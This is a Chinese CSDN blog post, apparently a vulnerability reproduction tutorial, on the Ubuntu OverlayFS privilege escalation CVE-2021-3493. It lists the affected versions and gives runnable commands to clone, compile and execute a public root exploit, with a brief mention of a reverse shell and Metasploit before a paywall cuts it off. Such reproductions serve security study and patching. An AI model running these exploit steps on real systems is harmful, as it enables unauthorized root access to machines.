【漏洞复现】Linux kernel权限提升漏洞 (CVE-2021-3493)

已于 2022-09-11 13:53:15 修改
阅读量706 收藏 2
点赞数 1
分类专栏: 优秀文章 秀秀 文章标签: linux ubuntu 运维
于 2022-08-22 14:30:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52549196/article/details/126464730
版权
本文介绍了Linux kernel的CVE-2021-3493漏洞,该漏洞允许在Ubuntu多个版本中提升至ROOT权限。受影响的Ubuntu版本包括20.10、20.04 LTS、18.04 LTS、16.04 LTS和14.04 ESM。作者提供了在Github公开的EXP利用方法,并通过Metasploit框架进行漏洞利用,详细步骤包括反弹shell和设置session。
摘要由CSDN通过智能技术生成

漏洞介绍

Ubuntu OverlayFS Local Privesc
CVE-2021-3493 EXP在Github被公开,可以通过EXP在Ubuntu多个影响系统中提升 ROOT权限

漏洞影响

Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM

查看版本

cat /proc/version

在这里插入图片描述

exp

git clone https://github.com/briskets/CVE-2021-3493.git
cd CVE-2021-3493
gcc exploit.c -o exp
chmod +777 exp
./exp

在这里插入图片描述

msf

  • 先反弹一个shell ,拿到session

在这里插入图片描述

  • search CVE-2021-3493

了解本专栏 订阅专栏 解锁全文 超级会员免费看
????27282
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
CVE-2021-3493(提权内核漏洞)
墨痕诉清风的博客
06-07 2234
CVE-2021-3493漏洞Linux内核中overlayfs文件系统中的Ubuntu特定问题,在Ubuntu中没有正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu带有一个支持非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来进行提权操作,因此该漏洞Linux的其他发行版没有影响。Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM (Linux内核版本 < 5.
CVE-2021-3493利用脚本
04-29
CVE-2021-3493利用脚本,具体参考https://blog.csdn.net/weixin_43742395/article/details/116274008
Linux 内核权限提升漏洞CVE-2024-1086三种修复方法
老苏畅谈运维
06-22 3162
漏洞成因:Netfilter是Linux内核中的一个数据包处理模块,它可以提供数据包的过滤、转发、地址转换NAT功能。2024年3月28日,监测到 Linux kernel权限提升漏洞CVE-2024-1086)的PoC/EXP在互联网上公开,该漏洞的CVSS评分为7.8,目前漏洞细节已经公开披露。
Ubuntu特权提升漏洞CVE-2021-3493
Li-D的博客
04-25 3182
漏洞描述 OverlayFS漏洞允许Ubuntu下的本地用户获得root权限Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特权。 影响版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM
CVE-2021-3493】——漏洞复现、原理分析以及漏洞修复
IronmanJay的博客
05-24 1125
Linux内核中的overlayfs实现未能在用户命名空间方面正确验证对底层文件系统中文件设置文件能力的操作。由于未特权用户命名空间与Ubuntu内核中允许未特权的overlay挂载的补丁的组合,攻击者可以利用这一漏洞获取提升权限
Ubuntu内核OverlayFS权限逃逸漏洞(CVE-2021-3493)
做自己喜欢的事,并将其发挥到极致!
12-06 1291
Linux Kernel 一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。Linux 内核中 overlayfs 文件系统是 Ubuntu 的特定问题,由于没有正确的验证文件系统功能在用户名称空间中的应用,从而导致攻击者可以安装一个允许未授权挂载的 overlayfs 修补程序来提升权限。一些版本存在本地用户提权至root权限
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限
CVE-2021-3493:Overlay 文件系统 Ubuntu 本地提权漏洞分析
个人笔记
07-02 1705
由于笔者已分析过 CVE-2023-0386,在此基础上,分析 CVE-2021-3493 可能更为简单。CVE-2023-0386 需要理解OverlayFS、Linux 命名空间、SetUID 位的概念;除此之外,如果你想理解 CVE-2021-3493,还需要了解Capability、Linux 文件扩展属性。当你理解了这些常见的概念之后,在手动复现这些漏洞,会有更加深刻的理解,并且可以提高对 Linux 本地提权漏洞的认知。
CVE-2021-3493漏洞复现--002
growler67
04-29 703
0x00 前言 很久没有写漏洞复现的文章了,今天忙里偷闲,测试了一下CVE-2021-3493。简单介绍一下CVE-2021-3493,这是关于ubuntu的内核提权漏洞。可以用让非root用户拿到root权限。 0x01 可利用版本 这个漏洞课利用的版本为: Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM 下载地址送上:http://old-releases.ubuntu.com/rele
Linux Polkit权限提升漏洞(CVE-2021-4034)
谢公子的博客
09-19 1851
Linux Polkit权限提升漏洞CVE-2021-4034)是由于pkexec无法正确处理调用参数,从而将环境变量作为命令执行,具有任意用户权限的攻击者都可以在默认配置下通过修改环境变量来利用此漏洞,从而获得受影响主机的root权限
CVE-2021-3493Linux kernel 特权提升漏洞复现
xiaoxizainiyanli的博客
04-22 385
漏洞介绍 Linux内核中的overlayfs文件系统中的Ubuntu特定问题,其未验证关于用户名称空间的文件系统功能的应用。Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来提权 涉及版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM 环境 learn@learn-virtual-machine:/tmp$ cat /etc/issue Ubuntu
Ubuntu用户提权CVE-2021-3493漏洞复现
gh0stf1re的博客
04-27 2698
1.漏洞摘要 Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特权。 CVE-2021-3493 linux内核中的overlayfs实现未就用户名称空间正确验证底层文件系统中文件的文件功能设置。由于无特权的用户名称空间以及Ubuntu内核中附带的允许无特权的覆盖挂载的补丁的组合,攻击者可以使用它来获得提升的特权,内核中的o
漏洞复现CVE-2021-3493
白帽子九一
02-16 3044
漏洞简介# Linux 内核中 overlayfs 文件系统是 Ubuntu的特定问题,由于没有正确的验证文件系统功能在用户名称空间中的应用,从而导致攻击者可以安装一个允许未授权挂载的 overlayfs 修补程序来提升权限 影响版本# ubuntu 20.04 ubuntu 16.04 ubuntu18.04 ubuntu 14.04 本次复现ubuntu20.04版本 漏洞复现# test@linux:~# git clone https://github.com/ASkyeye/CVE-
【已复现Linux Kernel 本地权限提升漏洞(CVE-2022-2602)安全风险通告
smellycat000的专栏
12-23 1943
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告近日,奇安信CERT监测到 Linux Kernel 本地权限提升漏洞Linux Kernel的io_uring 子系统中存在释放后重用漏洞,拥有低权限的本地攻击者可以利用该漏洞权限提升到ROOT权限。目前该漏洞PoC已公开在互联网上,鉴于该漏洞影响范围极大,建议客户尽快做好自查及防护。漏洞名称Linux Kern...
Linux提权—脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现: 脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
LINUX内核权限提升漏洞CVE-2024-1086),centos7离线处理方法
最新发布
08-08
LINUX内核权限提升漏洞CVE-2024-1086)通常指代的是Linux系统中发现的安全漏洞,这种漏洞可能导致攻击者通过恶意利用获取更高的权限,从而对系统造成未授权的操作。CentOS 7作为较旧版本的操作系统,可能不受最新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

????27282

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值